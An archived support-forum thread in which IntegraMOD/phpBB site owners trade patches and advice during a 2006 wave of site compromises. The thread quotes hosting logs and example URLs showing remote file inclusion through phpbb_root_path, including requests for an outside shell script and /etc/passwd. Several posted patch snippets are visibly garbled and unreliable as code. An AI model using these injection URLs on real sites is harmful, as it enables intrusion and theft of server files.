IntegraMOD

To avoid confusion this post has been moved to the Security Forum see link below.

[url=http]Moved to Security Forum[/url]

thanks Mike <img>

i believe this fix is for those who ppl who used premoded files..

i have the following code in my functions_portal.php

Code: Select all

if ( !defined('IN_PHPBB') ){     die('Hacking attempt');     exit;}include_once($phpbb_root_path . 'includes/lite.'.$phpEx);  

do i stil need to add the fix code?

Hi

a few of the other function_xxxxx.php files do not have the 'die hack' code in either. Should they have?

also, was a fix ever announced for the STYLE_URL [url=http]exploit[/url]?

Thanks

Unregistered, I guess everyone should check as it depends on when ppl downloaded their copy as we say in Ireland... to be sure to be sure

As for the STYLE_URL disable the Style Select block in admin until we have investigated this issue.

Mike

hi Michaelo,
what i meant was, wudnt it make it as like a duplication code?

Unregistered, sorry about that <img> your copy of the file is fine no need for edits.
Mike

thanks.. and am glad finally Integramod took the STYLE_URL vulnerability to attention <img>

As we are gettin more attacks, i think its wise to do a mass email and notify about the security patch who aint yet hacked/attacked..

As a n00b, I need to ask. Does it matter where in the file I put this fix? First, last, throw a dart? <img>

hey Michaelo

thankfully i have already disabled the style select on my site as I dont want people to be able to use it anyway.

I will go through all teh functions and add the die hack code

Cheers

<img>

"ihammo";p="14125" wrote:thankfully i have already disabled the style select on my site as I dont want people to be able to use it anyway.

I don't think disabling the style select has anything to do with it...
It's in the URL that hackers are able to add code to break in...

True for you evolve <img> hiding it is not the answer I stand corrected... Once it is disabled we will have to comment out the offending code in functions.php and rename the block file...
[align=center:3mza83rm]Code in this post has been update... See first post in this thred[/align]
Part 1:
Edit this file: functions.php
Find the following codeà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

Code: Select all

    if ( isset($HTTP_POST_VARS[STYLE_URL]) || isset($HTTP_GET_VARS[STYLE_URL]) )     {         $style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] ] );         if ( $theme = setup_style($style) )         {             setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);             return;         }     }         if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) )     {         $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style'];         if ( $theme = setup_style($style) )         {             return;         }     }  

Replace withà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

Code: Select all

 /*     if ( isset($HTTP_POST_VARS[STYLE_URL]) || isset($HTTP_GET_VARS[STYLE_URL]) )     {         $style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] ] );         if ( $theme = setup_style($style) )         {             setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);             return;         }     }         if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) )     {         $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style'];         if ( $theme = setup_style($style) )         {             return;         }     }*/  

Then (for the moment) rename block_imp_style_select.php to something like block_imp_style_select.xxx

I added the code fix for functions_portal.php last night and was hacked again today. I will try the "Edit this file: functions.php" suggestion next.

You could also try this... Find any occurrence of

[align=center:2qmeehks]Code in this post has been update... See first post in this thred[/align]

Code: Select all

 if(isset($HTTP_POST_VARS['STYLE_URL']) || isset($HTTP_GET_VARS['STYLE_URL']))  replace with  if(isset($HTTP_POST_VARS['STYLE_URL']) || (int) isset($HTTP_GET_VARS['STYLE_URL']))  And  $style = urldecode((isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] ]);  with  (int) $style = urldecode((isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] : (int) $HTTP_GET_VARS['STYLE_URL']);  

And have you any more details of the hack...?

We have not determined where the hacker is gaining access... <img>
The only vulnerabilities we can identify include Style Select block code (STYLE_URL) and possibly two other relating to some versions of php

Mike

"Michaelo";p="14133" wrote:And have you any more details of the hack...?

Mike

phpbb_security 1.0.3 & phpbb 2.0.21 are both vulnerable.
CHMOD settings dont matter.
Safety fix for "functions_portal.php" does not stop the hacks.

Folders they like to add files to are:

/forum/cache/
/forum/var_cache/
/forum/profilcp/def/
/forum/modules/cache/explain/
/forum/files/
/forum/includes/cache_tpls/

Pretty much pick any CHMOD: 777 folder.


Files they like to trash are:

common.php
portal.php
phpbb_security.php
config.php

They are Turks.
They dont like IntegraMOD.
They don't like Greeks, Israelis, or Americans.

<img>

I used the premodded files to update IM, but as I reported on the update topic, I checked all files and this was one of the code that was not included in the premodded files.

I hope this is the only vulnerability of IM.
Just to be on the safe side, I have removed the Style code as advised by Michaelo.

However, I'm quite worried because I'm getting several /search?q=Powered+by+IntegraMOD on my referrals page. This might mean I'm having a bunch of script kidies on my site, but they don't seem to come from Turkey alone. Some ips I got in the last couple of hours come form:
- Turkey
- Oman
- Germany
- Uruguay
- Argentina
- Canada
- Spain

This means that the scrip is widespread now.
I don't seem to have suffered anything until this moment.
I hope that means my code is secure.

To determine which hack is being used can people who have been hacked respond to this post with an answer to the following question:


Check if functions_portal.php contains this code (especially the root path setting)

Code: Select all

 if ( !defined('IN_PHPBB') ){    die("Hacking attempt");}$phpbb_root_path = "./";  

Mike

toplist users read this! Hotfix for toplist 1.x

[align=center:6w5mxpw5]Code in this post has been update... See first post in this thred[/align]
[code]  OPEN]

Note: Register globals must be on to use the latest (3) exploits so if in doubt why not turn it off?

I don't know if ppl have this mod but this may help them avoid the potential hack... Mike

As I was hacked too and am using a stone age old version i DON'T think it is 1.40 related. If it's in integra, it's been there for a long time or it's a weakness somehow in the db. I got hacked today as well. It truly SUCKS butt.

MY main worry is that they have gotten to my password for the database and the whole shebang out of config.php. What to do?

Do I need to ask my provider to trash it all and try to rebuild fresh? Suggestions welcomed!

Should not be needed but a new password would be recommended...

[align=center:2spjinyq]Code in this post has been update... See first post in this thred[/align]

Even More fixes...

kb_constants.php

Code: Select all

 FIND // This file defines specific constants for the module  BEFORE ADD  if ( !defined('IN_PHPBB') ){    die("Hacking attempt");}  

admin_hacks_list.php

Code: Select all

   FIND$phpbb_root_path = '../';if( !empty($setmodules) ){    include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_hacks_list.' . $phpEx);    $filename = basename(__FILE__);    $module['General']['Hacks_List'] = $filename;        return;}  include($phpbb_root_path . 'extension.inc');(file_exists('pagestart.' . $phpEx)) ? include('pagestart.' . $phpEx) ]['Hacks_List'] = $filename;        return;}  $phpbb_root_path = './../';require($phpbb_root_path . 'extension.inc');require('./pagestart.' . $phpEx);  

Many thanks to all the sites that helped in the discovery so far but there may be more...


Please read all posts in this thread as I don't have time to organise the fixes...
Mike

Links for more details]Here![/url]

"Michaelo";p="14149" wrote:toplist users read this! Hotfix for toplist 1.x

[code]  OPEN]

Note: Register globals must be on to use the latest (3) exploits so if in doubt why not turn it off?

I don't know if ppl have this mod but this may help them avoid the potential hack... Mike

I have this mod installed (v.1.0.0) but I cannot find any bit of the pre-existing code you mention. What line is this on?

Can you explain this a little further -> "Note: Register globals must be on to use the latest (3) exploits so if in doubt why not turn it off?"

Post the top five or six lines of you toplist.php code here...

Some of the fixes are suggestion I came across which may not exactly mirror our files however I think a problem with the code is better than a hacked site <img> so I am posting everything that may help... Later we can go over things and sort out what's what...
Mike

"Michaelo";p="14157" wrote:Post the top five or six lines of you toplist.php code here...

Some of the fixes are suggestion I came across which may not exactly mirror our files however I think a problem with the code is better than a hacked site <img> so I am posting everything that may help... Later we can go over things and sort out what's what...
Mike

Thanks

Code: Select all

 <php>set_filenames(array('body' => 'topsites_edit_body.tpl') );       $siteid     = intval(($_GET['site']) ? $_GET['site'] : $HTTP_GET_VARS['site']);     $site_info   = GetTopsiteFromId($siteid);  

My host sent me his logs.. maybe this will help.

Code: Select all

This is Hal Bouma with Netwisp writing to inform you that your web hosting account with us is currently violating our AUP/TOS policies. Your forum software is being exploited by hackers which is allowing them to upload and run PHP scripts of their chosing and attack other servers.  Here are the http logs for how the vulnerability is being injected] "POST /phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?HTTP/1.1" 200 41415"http://www.rpghq.org/phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"rpghq.org:203.87.211.27 - - [26/Aug/2006:02:45:25 -0500] "POST /phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?HTTP/1.1" 200 41495"http://www.rpghq.org/phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"  If you view the file that it was grabbing, [url=http://the-bos.org/memek.txt]http://the-bos.org/memek.txt[/url], you can see that it's a remote execution script. It has been uploaded to your forums/files directory as post.php which they are now using to run commands on your server:  rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:09 -0500] "POST /forums/files/post.php HTTP/1.1" 200 42087 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:31 -0500] "POST /forums/files/post.php HTTP/1.1" 200 41168 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:59 -0500] "POST /forums/files/post.php HTTP/1.1" 200 41251 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"  If you view the contents of the post.php, you will see it's the same script as the one that was grabbed off the-bos.org site.  Your forums have been disabled (its root directory has been changed to chmod600) to prevent further attacks on the server and others. Please fix the exploits in your script before re-enabling it. Please also let me know when this is completed.  Let me know if you have any questions about this matter and I will be glad to answer them.  

Hopefully this helps you find the exploit

"Dioncecht";p="14162" wrote:My host sent me his logs.. maybe this will help.

Code: Select all

This is Hal Bouma with Netwisp writing to inform you that your web hosting account with us is currently violating our AUP/TOS policies. Your forum software is being exploited by hackers which is allowing them to upload and run PHP scripts of their chosing and attack other servers.  Here are the http logs for how the vulnerability is being injected] "POST /phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?HTTP/1.1" 200 41415"http://www.rpghq.org/phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"rpghq.org:203.87.211.27 - - [26/Aug/2006:02:45:25 -0500] "POST /phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?HTTP/1.1" 200 41495"http://www.rpghq.org/phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"  If you view the file that it was grabbing, [url=http://the-bos.org/memek.txt]http://the-bos.org/memek.txt[/url], you can see that it's a remote execution script. It has been uploaded to your forums/files directory as post.php which they are now using to run commands on your server:  rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:09 -0500] "POST /forums/files/post.php HTTP/1.1" 200 42087 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:31 -0500] "POST /forums/files/post.php HTTP/1.1" 200 41168 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:59 -0500] "POST /forums/files/post.php HTTP/1.1" 200 41251 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"  If you view the contents of the post.php, you will see it's the same script as the one that was grabbed off the-bos.org site.  Your forums have been disabled (its root directory has been changed to chmod600) to prevent further attacks on the server and others. Please fix the exploits in your script before re-enabling it. Please also let me know when this is completed.  Let me know if you have any questions about this matter and I will be glad to answer them.  

Hopefully this helps you find the exploit

In other words they are exploiting "functions.php" and uploading a remote execution script file (c99.php, musa.php, or post.php) to random CHMOD: 777 folders, then running the remote execution script file from there <img>

"Michaelo";p="14153" wrote:kb_constants.php

Code: Select all

 FIND // This file defines specific constants for the module  BEFORE ADD  if ( !defined('IN_PHPBB') ){    die("Hacking attempt");}  

My copy of this file is missing these lines indicated in the FIND for kb_constants.php. Where should I place the new code?

EDIT
I follow the link included and found the anwser. It should appear before]// ---------------------------------------------------------------------START// This file defines specific constants for the module[/code]

Dioncecht it helps quite a bit many thanks... it guides us in the right direction... Can you PM me with the first few line of your functions_portal.php and functions.php files.

The bit after the ***************************************************************************/
Thanks, Mike

Dr. Bantham,

My kb_constants.php version may be different as I only have the 1.4.1 version. The main thing to add as the first few lines of code in this file is:

Code: Select all

 if ( !defined('IN_PHPBB') ){    die("Hacking attempt");}  

Normally at the top of the page under the opening comments... (this exploit may not be the one that is hitting site at the moment but add the code just in case)

Mike

According to Google Analytics, I have had 42 referrals from "powered by integramod" searches. I am holding my breath at this point. <img>

I was just hit again and I have done ALL of the suggestions.

This time my "index.php" was manipulated.

The file uploaded was called "jkztawoe.php" and it was uploaded to my "/forum/images/avatars/" folder.

jkztawoe.php

Code: Select all

 <php>  

integramod.com has been on and offline over the past few days, therefore I am not sure what to think since they are offline at the moment. I do not want to summon the ultimate jinx, mind you, but it seems a bit odd that integrmod.com remains untouched while a global onslaught is being waged by miscreants intent on taking down IntegraMod users. Either they are using integrmod.com as a window into our misery or there is some code variance between this site and the 1.4.0 release package. I hope the latter is true.

I dont understand why they havent targeted this site either and if they have then I dont understand why this site has survived.

"Solomon";p="14183" wrote:I dont understand why they havent targeted this site either and if they have then I dont understand why this site has survived.

Another thread pointed out that the footer credit for integrmod.com displays "Powered by KisMod". Would this be enough to avoid focus?

I received an e-mail from a guest of my site, apparently Integramod is not this hackers only target.

[url=http]http://forum.mamboserver.com/showthread.php?t=83899[/url]

"Dr. Bantham";p="14184" wrote:

"Solomon";p="14183" wrote:I dont understand why they havent targeted this site either and if they have then I dont understand why this site has survived.

Another thread pointed out that the footer credit for integrmod.com displays "Powered by KisMod". Would this be enough to avoid focus?

They know the address and read everything we say. Any basic google or yahoo search for "integraMOD" shows http://www.integraMOD2.com at the #3 & #4 spots.

If I do a Google search for "powered by integramod", the first return is:
http://www.securityfocus.com/archive/1/444207
This is strange as it appears to be a security warning for the attack that is taking place, having been logged two days ago.

The second is my site. I am certain that I will be taken down at some point, but why not yet?

"Dr. Bantham";p="14188" wrote:If I do a Google search for "powered by integramod", the first return is:
http://www.securityfocus.com/archive/1/444207
This is strange as it appears to be a security warning for the attack that is taking place, having been logged two days ago.

The second is my site. I am certain that I will be taken down at some point, but why not yet?

Guess this explains it all <img> http://www.nukedx.com/?getxpl=47

It has become clear that there are several hackers at work possibly using two or more hack/exploits...

The main trouble maker appears to use the phpbb_root_path var to process the off site script... needless to say if the phpbb_root_path var is set correctly the script will fail... The hacker uploads several files to your site and proceeds to trash things.

If you have been hack remember to change your password...

The following code should fix the main threat but be aware it is not the only threat...

Edit functions_portal.php

[code]    FIND]

Please note this is almost certainly not the only hack/exploit affecting IntegraMod sites. But it would appear the two main hacks concentrate on the phpbb_root_path variable not being set inside the correct file and the defined IN PHPBB being missing from crucial files.

Mike

I just now found the file jtvewvwu.php in my var_cache directory. Content as follows:

Code: Select all

<php>

I have removed the file, but expect it to reappear with ease. Should I take my site down for protection of members and my host server provider?

The original file is off-site this is just the cache copy

eval() evaluates the string given in code_str as PHP code. Among other things, this can be useful for storing code in a database text field for later execution and that could be doggy...
Take the site down and chmod the root directory to 600
Mike

"Michaelo";p="14192" wrote:The original file is off-site this is just the cache copy

eval() evaluates the string given in code_str as PHP code. Among other things, this can be useful for storing code in a database text field for later execution and that could be doggy...
Take the site down and chmod the root directory to 600
Mike

So you are saying that if weve been hacked, even if we deleted all files and started with fresh, our database may have a hack in it???

Does changing this stop style changing from working as we have two links of the QBar menu to swap styles?

The topic should be changed from "IntegraMod Hack fix" to "IntegraMod Hack discussion" to lessen confusion until a solid fix is available.

<img> Until a solid fix is available I've decided to CHMOD: 600 my "forum" directory and enable some .htaccess redirects to display a photo of a USA flag. Everytime they do a search for "Powered by IntegraMOD" or "Powered by KisMod" and attempt to hit my site again, they can stare at my flag instead of me staring at theirs. My host is also monitoring for suspicious activity.
[marq=left:9f1rlnmv]:grin:[/marq:9f1rlnmv]

"evolver";p="14165" wrote:Euhm, how many of these hacked sites have a link on integraMOD2.com...
...or maybe even still on integraMOD.com ??

No need for Google to find these...
No need for 'Powered by' keywords to find these...

There are easier ways to find integraMOD sites than just by using Google...
And ofcourse, that could also be a very good reason why integraMOD.com hasn't been hacked yet...

Just don't focus at one direction only...
Think about every possibility, because that's how hackers think as well...

Also, think about the Referers at the homepage...
That can also open a window of opportunity to hackers.

And as a precaution...
Maybe there should be a seperate rescue-site for integrmod.com.
Just a safe non-integramod site where all users can go for help and information if integraMOD2.com itself would be taken out...
Then nobody has to stay in the dark if something bad happens...

If not all disasters can be avoided, there should always be a disaster-plan ready...

If the php setting [url=http]magic_quotes_gpc[/url] is set to ON on the server then this hack wont be able to include the external files as the remote attacker needs to use null char at the end of filename.

The file musa.php mentioned is the hack's own php shell with some nice settings (magic_quotes off etc) so make sure to delete this file if u have been attacked.

The fix in the beginning of this thread should be enough to stop this hack...

We have to be carefull not to place hacker-codes in the open...
Because it would make from integraMOD2.com a supportsite for hackers itself...
Wouldn't that be foolish...

Better only PM hackerscripts to the ones you can trust...
Always remember that there can be potential hackers among visitors...
You never know...

Just the fact that they can find it somewhere else,
doesn't mean that we should give it to them on a plate...

hi, jus found this page which has been updated couple of days back..

phpBB viewtopic.php Vulnerability Hack and Forensic Followup

by Marion Bates <mbates>

Last modified: August 25 2006 16:05:41

http://www.whoopis.com/howtos/phpbb-vie ... index.html

Do we need to worry abt this as well? :s

After finding the file jtvewvwu.php in my var_cache directory, my site seemed to be still operating without problems. However, when I proceeded to ACP, I received a white screen with several indicators that key files being referenced by functions.php were missing. I took the site down immediately and set the root directory permissions to 600 as Michaelo instructed. While perhaps overkill, I deleted all integramod directories from the server. This is my third or fourth time being hacked in about 18 months with IntegraMod, so I have recent backups of the database and server files as follows:

Database
8/27/06 1:39 am
8/26/06 9:26 pm
8/26/06 8:25 pm
8/25/06 6:54 am
8/12/06 8:34 am
7/30/06 8:33 am

I may have additional copies as well, but my database backup regimen often falters over time and the automatic IM backup has been generating 0 byte backups since a server migration several months back.

Before I took everything down last night, I used phpBB Backup Suite to create an SQL bin log. The only line contained was:

Code: Select all

/*!40019 SET @@session.max_insert_delayed_threads=0*/;

This may be normal, but I am listing it here for review.

I also use phpBB Backup Suite to create entire backups of my file structure, since I am utilizing a shared server host. My file backup dates are as follows:
8/26/06 9:31 pm
8/25/06 5:57 am
8/12/06 8:42 am
7/30/06 8:36 am

I list these dates because it appears that the file jtvewvwu.php was not present in the 7/30/06 backup but actually showed up in the var_cache directory as early as the 8/12/06 backup. I often check the dates of modified files and directories of my live site in order to identify tampering, but this one slipped by me since I often overlook cache directories as they are updated periodically.

Since I have a decent series of archives to analyze, are there any other files or anomalies I should search for?

My database size has not decreased at any point, therefore I am hoping that content has not been erased or modified within the database. How can I confirm this?

If this method has indeed compromised my database with executable embeds, how can I identify and remove these modifications?

What passwords should I change at this point? Administrators? SQL access? Server account?

When I bring the site back online, what should the root directory permissions be set to?

I am keeping my site offline until a fix for this hack has been proven. If any further information can potentially be gleaned from reviewing my backup archives, please advise of what to look for.

Dr. Bantham, i just offlined my live site as well.. am waitin for a patch as well <img>

Folks, I got hacked too. I found the hacker was using the phpbb_root_path to execute a script on a remote server. Turning off register_globals in php.ini stopped the script from executing. Not sure if that is a total fix but my site remains online and I am waiting with a big stick for the next attempt...

WARNING!!!

Do not under ANY circumstances give this guy <a>alemci_2784@hotmail.com</a> the URL to your site.. That is our pal the Turk... I had a brief chat with him on MSN Messenger. He was trying like hell to get the URL to my site, but I blocked and deleted him.

dont you think ur signature gives his answer?

god bless kismod hehe ive been just hacked ..

Whoever got me, got me bad. I came home from work with a letter from my host that -

Your site has been suspended due to a hacked file that is phishing for Bank of America customer information.

I contacted them but cant get them on the phone and they havent answered by email yet. I have no clue what to do next. I think I will have to either just let the site go or hire someone to get it fixed.

"evolver";p="14199" wrote:

"evolver";p="14165" wrote:Euhm, how many of these hacked sites have a link on integraMOD2.com...
...or maybe even still on integraMOD.com ??

No need for Google to find these...
No need for 'Powered by' keywords to find these...

There are easier ways to find integraMOD sites than just by using Google...
And ofcourse, that could also be a very good reason why integraMOD.com hasn't been hacked yet...

Just don't focus at one direction only...
Think about every possibility, because that's how hackers think as well...

Also, think about the Referers at the homepage...
That can also open a window of opportunity to hackers.

And as a precaution...
Maybe there should be a seperate rescue-site for integrmod.com.
Just a safe non-integramod site where all users can go for help and information if integraMOD2.com itself would be taken out...
Then nobody has to stay in the dark if something bad happens...

If not all disasters can be avoided, there should always be a disaster-plan ready...

I still dont understand why this site has survived and all of ours have not. Obviously integrmod.com has something right. Care to share the secret?

"Painface";p="14200" wrote:The fix in the beginning of this thread should be enough to stop this hack...

Negative, it is not nor are any of the suggested fixes so far. I was hacked 4 times in 3 days. It was like everytime I did a newly suggested fix they countered by re-hacking and thus proving otherwise.

"florida4x4";p="14211" wrote:Folks, I got hacked too. I found the hacker was using the phpbb_root_path to execute a script on a remote server. Turning off register_globals in php.ini stopped the script from executing. Not sure if that is a total fix but my site remains online and I am waiting with a big stick for the next attempt...

This one I have not tried but this is why I suggested the topic of this thread be changed.

"Solomon";p="14198" wrote:The topic should be changed from "IntegraMod Hack fix" to "IntegraMod Hack discussion" to lessen confusion until a solid fix is available.

<img> Until a solid fix is available I've decided to CHMOD: 600 my "forum" directory and enable some .htaccess redirects to display a photo of a USA flag. Everytime they do a search for "Powered by IntegraMOD" or "Powered by KisMod" and attempt to hit my site again, they can stare at my flag instead of me staring at theirs. My host is also monitoring for suspicious activity.
[marq=left:19snu5f7]:grin:[/marq:19snu5f7]

am sure they are workin on it.. please be patient.. <img>

I emailed my host to let them know what's going on and setup a livejournal account as a status page for my site. I tried to mass email my users but get an error 'hacking attempt' which may or may not be attributed to a file I had to change above.

We'll see what happens. Right now I'm flying under the radar.

Edited to remove link. PM me if you would like it sent to you.

I've got a 1.40, 1.4.1Beta2 and a 1.4.1Beta3 running and haven't been hit (yet), but have been probed from at least 4 Turkish IPs in the past 24 hours. Made the primary recommended patch for all three, and all of the recommended changes listed here for the 1.4.0 site. Decided to not do some of the mods listed here for the other two sites since I don't really need them and they would be good test beds.

I checked my magic_quotes_gpc setting after reading the link above and found I've never had it on for any of my sites. For those who have been hit, was this set to "On" when you got hit? I've since changed that setting to "On" for all three forums.

For now I'm just watching my HTTP Referrs and banning IPs that are using the search wording discussed above. I know that won't do much, but it does make me feel better.... <img>

From all your the PMs and other information I have obtained the main hack is definitely using the functions_portal.php vulnerability... This is fixed in the first post of this thread. The missing $phpbb_root_path = "./"; statement allows hackers to execute a remote script. Note once they have gained access they then use several methods to mess up your forum each having different effects.

Two other setting changes will stop this and other hacks from working i.e.

In your php.ini file set register_globals off and disable the passtru function.

Note setting register_globals off may stop some mods from functioning but hopefully this is only a temporary measure.
Mike

My phpbb_security.php file was also hacked I have replace it with a fresh one with what i think are the right settings now when I access my forum all i get is the following


Fatal error: Call to undefined function: phpbbsecurity_guests() in /home/fhlinux184/a/abcunited.co.uk/user/htdocs/integra140/common.php on line 397

any help please.

site that was hacked http://www.abcunited.co.uk

Vadar thanks for the link.. now i see the methods..

EXAMPLE -> http://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE -> http://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00 <- mq off


from what i see, they are using the INCLUDES folder to plant the bug..

now i just uploaded a .htacces files to my test site's INCLUDES Folder with a directory password.. the site works fine so far.. can anyone apply this and see whther it works?

"Michaelo";p="14229" wrote:Two other setting changes will stop this and other hacks from working i.e.

In your php.ini file set register_globals off and disable the passtru function.

Note setting register_globals off may stop some mods from functioning but hopefully this is only a temporary measure.
Mike

Forgive my ignorance, I can see under my php info that register globals is on, where would you turn it off in the admin panel or is this server/hosting side?

"Master Dwarf";p="14232" wrote:

"Michaelo";p="14229" wrote:Two other setting changes will stop this and other hacks from working i.e.

In your php.ini file set register_globals off and disable the passtru function.

Note setting register_globals off may stop some mods from functioning but hopefully this is only a temporary measure.
Mike

Forgive my ignorance, I can see under my php info that register globals is on, where would you turn it off in the admin panel or is this server/hosting side?

Yes could you please explain this alittle further. We appreciate your help Mike.

I have searched a little further on the internet...
...looking for advise to secure PHP-programming.

Read this:
http://www.zend.com/zend/art/art-oertli.php

I think it says a lot about the way hacks could happen and also shows the way to avoid it in PHP scripting...
And everything in that article seems to be much about what we are dealing with...

About protecting download-directories
Read this:
http://www.zend.com/zend/trick/tricks-august-2001.php

"Solomon";p="14233" wrote:

"Master Dwarf";p="14232" wrote:

"Michaelo";p="14229" wrote:Two other setting changes will stop this and other hacks from working i.e.

In your php.ini file set register_globals off and disable the passtru function.

Note setting register_globals off may stop some mods from functioning but hopefully this is only a temporary measure.
Mike

Forgive my ignorance, I can see under my php info that register globals is on, where would you turn it off in the admin panel or is this server/hosting side?

Yes could you please explain this alittle further. We appreciate your help Mike.

If you read the first article in my previous posting, you will find this about turning the configuration directive register_globals off:

"Zend Technologies" wrote:I am glad I did not have much time to write this article in early December 2001, because in the meantime Andi and Zeev added some very useful arrays in PHP v4.1.0: $_GET, $_POST, $_COOKIE, $_SERVER, $_ENV and $_SESSION. These variables deprecate the old $HTTP_*_VARS arrays and can be used regardless of the scope. There is no need to import them using the global statement within functions.

Do yourself a favour and turn the configuration directive register_globals off. This will cause your GET, POST, Cookie, Server, Environment and Session variables not to be in the global scope anymore. Of course, this requires you to change your coding practice a little. But it is definitely a good thing to know where your variables come from. It will help you prevent security holes described in chapter 2.2.

register_globals
http://be2.php.net/manual/nl/faq.misc.p ... terglobals

I see.

"Master Dwarf";p="14239" wrote:I see.

I'm just putting everything I can find on this matter in this thread...
I just hope someone can tell us how to implement it...

Changing the register_globals, that's in php.ini as Michaelo said...
But not everyone can do that, only the serverhost can and some just won't allow it because it will affect every other site on their server as well...
Then the emulater can be a solution, but I don't know exactly how and where to put it neighter...
I can just quess it would be in common.php...
(I'm not an expert, just a beginner)

I'm looking further to find any information that can help to beat this...

if you want to know whether your register_globals is on or off you can view it from admin panel -> tools -> PHP Info

and do a search (or CTRL+F) for "register_globals"

it wil show your Local Value and Master Value of your PHP Info

now ive just spoken to my hosting company and asked them to turn it off.. now from my PHP Info i see
register_globals Local Value OFF and Master Value ON

earliar the both values were ON..

"evolver";p="14242" wrote:Changing the register_globals, that's in php.ini as Michaelo said...
But not everyone can do that, only the serverhost can and some just won't allow it because it will affect every other site on their server as well...
Then the emulater can be a solution, but I don't know exactly how and where to put it neighter...
I can just quess it would be in common.php...
(I'm not an expert, just a beginner)

I'm looking further to find any information that can help to beat this...

Ok, this helps. Thanks.

it wil show your Local Value and Master Value of your PHP Info

I take it local value pertains to your site only and Master Value is server-wide. hmmm...will setting local to off help? Maybe thats the way to go for me right now.

While some of you may have access to php.ini the majority will have to contact your hosts and request the changes note this should be temporary.

See these links for how to do this...
[url=http]Link 1[/url]
[url=http]Link 2[/url]

Also his is interesting:
http://forum.mamboserver.com/showthread.php?t=26067

It's not about integraMOD, I know...
PHP-issues are no different on other CMS-scripts, so we can learn from that as well...

The register_globals emulator:

This should be the code it is in common.php (or should be)

Code: Select all

 if (@ini_get('register_globals') == '1' || strtolower(@ini_get('register_globals')) == 'on'){    // PHP4+ path          $not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS', 'HTTP_SESSION_VARS', 'HTTP_ENV_VARS', 'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');        // Not only will array_merge give a warning if a parameter    // is not an array, it will actually fail. So we check if    // HTTP_SESSION_VARS has been initialised.     if (!isset($HTTP_SESSION_VARS) || !is_array($HTTP_SESSION_VARS))     {         $HTTP_SESSION_VARS = array();     }       // Merge all into one extremely huge array; unset     // this later     $input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS, $HTTP_SESSION_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES);       unset($input['input']);     unset($input['not_unset']);       while (list($var,) = @each($input))     {         if (in_array($var, $not_unset))         {             die('Hacking attempt!');         }         unset($$var);     }       unset($input);}  

Check you version and let me know it common.php contains the above code.
Mike

"Unregistered";p="14213" wrote:dont you think ur signature gives his answer?

Yeah but I'm not going to hand it to him. If he wants it he can look for it. Besides he's tried to hack my site a few more times unsuccessfully in the last few hours. It looks like Michaelos patch is working.

"Michaelo";p="14248" wrote:The register_globals emulator:

